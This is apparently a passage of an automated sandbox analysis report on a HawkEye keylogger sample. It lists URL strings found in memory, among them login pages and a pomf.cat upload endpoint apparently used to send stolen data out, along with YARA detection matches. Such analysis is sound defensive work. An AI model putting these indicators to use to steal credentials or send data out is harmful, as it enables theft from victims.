Source: vbc.exe, 00000006.00000003.404653728.00000000020E2000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=7&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=199&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=348&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=2&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.c
Source: vbc.exe, 00000002.00000003.369053591.0000000002213000.00000004.00000001.sdmp	String found in binary or memory: onsent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=199&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=348&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=2&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: vbc.exe, 00000002.00000003.369053591.0000000002213000.00000004.00000001.sdmp	String found in binary or memory: onsent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=199&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=348&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=2&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: vbc.exe, 00000006.00000003.404912057.00000000020E3000.00000004.00000001.sdmp	String found in binary or memory: onsent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=199&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=348&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=2&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: vbc.exe, 00000006.00000003.404912057.00000000020E3000.00000004.00000001.sdmp	String found in binary or memory: onsent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=199&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=348&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=2&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	String found in binary or memory: http://bot.whatismyipaddress.com/
Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	String found in binary or memory: http://pomf.cat/upload.php
Source: b15023b1855da1cf5213b061dc626cc2.exe, 00000000.00000002.368012063.0000000032130000.00000004.00000001.sdmp, RegAsm.exe, 00000001.00000002.602404324.0000000000402000.00000040.00000001.sdmp, xjyxibeifbdmock.exe, 00000004.00000002.403557593.0000000031EE0000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.602420435.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: http://pomf.cat/upload.php&https://a.pomf.cat/
Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	String found in binary or memory: http://pomf.cat/upload.phpCContent-Disposition:
Source: vbc.exe, 00000006.00000003.404525940.00000000020E0000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404912057.00000000020E3000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404720258.00000000020E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.co
Source: vbc.exe, 00000002.00000002.370154038.000000000019C000.00000004.00000010.sdmp, vbc.exe, 00000006.00000002.405184269.000000000019C000.00000004.00000010.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: vbc.exe, 00000013.00000002.540468694.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: vbc.exe, 00000002.00000002.370773894.000000000076D000.00000004.00000020.sdmp	String found in binary or memory: https://2542116.fls.doubleM
Source: vbc.exe, 00000002.00000003.368921310.0000000002212000.00000004.00000001.sdmp, vbc.exe, 00000002.00000003.368809279.0000000002210000.00000004.00000001.sdmp, vbc.exe, 00000002.00000003.369053591.0000000002213000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404653728.00000000020E2000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404525940.00000000020E0000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404912057.00000000020E3000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404720258.00000000020E1000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
Source: vbc.exe, 00000002.00000002.370849978.0000000002214000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.405655164.00000000020E4000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
Source: RegAsm.exe, 00000001.00000002.605985687.00000000033C3000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.605786252.0000000002D23000.00000004.00000001.sdmp	String found in binary or memory: https://a.pomf.cat/
Source: vbc.exe, 00000006.00000003.404525940.00000000020E0000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404912057.00000000020E3000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404720258.00000000020E1000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: vbc.exe, 00000006.00000003.404525940.00000000020E0000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404912057.00000000020E3000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404720258.00000000020E1000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
Source: vbc.exe, 00000002.00000002.370773894.000000000076D000.00000004.00000020.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
Source: vbc.exe, 00000006.00000003.404525940.00000000020E0000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404912057.00000000020E3000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404720258.00000000020E1000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c
Source: vbc.exe, 00000002.00000002.370773894.000000000076D000.00000004.00000020.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
Source: vbc.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: vbc.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: vbc.exe, 00000002.00000003.368921310.0000000002212000.00000004.00000001.sdmp, vbc.exe, 00000002.00000003.368809279.0000000002210000.00000004.00000001.sdmp, vbc.exe, 00000002.00000003.369086619.0000000002211000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404653728.00000000020E2000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404525940.00000000020E0000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404720258.00000000020E1000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404942662.00000000020E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex
Source: vbc.exe, 00000002.00000002.370773894.000000000076D000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-yoP
Source: vbc.exe, 00000002.00000003.368809279.0000000002210000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.404525940.00000000020E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https:/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 00000000.00000002.368012063.0000000032130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.605834694.0000000002D29000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.606017869.00000000033C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.602420435.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.403557593.0000000031EE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.602404324.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6852, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6476, type: MEMORY
Source: Yara match	File source: Process Memory Space: xjyxibeifbdmock.exe PID: 6828, type: MEMORY
Source: Yara match	File source: Process Memory Space: b15023b1855da1cf5213b061dc626cc2.exe PID: 6432, type: MEMORY
Source: Yara match	File source: 4.2.xjyxibeifbdmock.exe.31ee0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.xjyxibeifbdmock.exe.31ee0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 2_2_0040F078 OpenClipboard,GetLastError,DeleteFileW,

2_2_0040F078

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000002.368012063.0000000032130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000000.00000002.368012063.0000000032130000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HawkEye v9 Payload Author: ditekshen
Source: 00000005.00000002.608578652.0000000004D10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 00000005.00000002.605834694.0000000002D29000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000001.00000002.606017869.00000000033C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000001.00000002.608991770.00000000053B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 0000000D.00000002.502433502.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 00000005.00000002.602420435.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000013.00000002.540468694.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 00000004.00000002.403557593.0000000031EE0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000004.00000002.403557593.0000000031EE0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HawkEye v9 Payload Author: ditekshen
Source: 00000001.00000002.602404324.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 6852, type: MEMORY	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 6476, type: MEMORY	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: Process Memory Space: xjyxibeifbdmock.exe PID: 6828, type: MEMORY	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: Process Memory Space: b15023b1855da1cf5213b061dc626cc2.exe PID: 6432, type: MEMORY	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 4.2.xjyxibeifbdmock.exe.31ee0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 4.2.xjyxibeifbdmock.exe.31ee0000.1.unpack, type: UNPACKEDPE	Matched rule: HawkEye v9 Payload Author: ditekshen
Source: 5.2.RegAsm.exe.4d10000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 13.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 13.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 19.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 5.2.RegAsm.exe.4d10000.1.unpack, type: UNPACKEDPE	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 1.2.RegAsm.exe.53b0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 0.2.b15023b1855da1cf5213b061dc626cc2.exe.32130000.1.unpack, type: UNPACKEDPE	Matched rule: HawkEye v9 Payload Author: ditekshen
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: HawkEye v9 Payload Author: ditekshen
Source: 4.2.xjyxibeifbdmock.exe.31ee0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 4.2.xjyxibeifbdmock.exe.31ee0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: HawkEye v9 Payload Author: ditekshen
Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: HawkEye v9 Payload Author: ditekshen
Source: 19.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
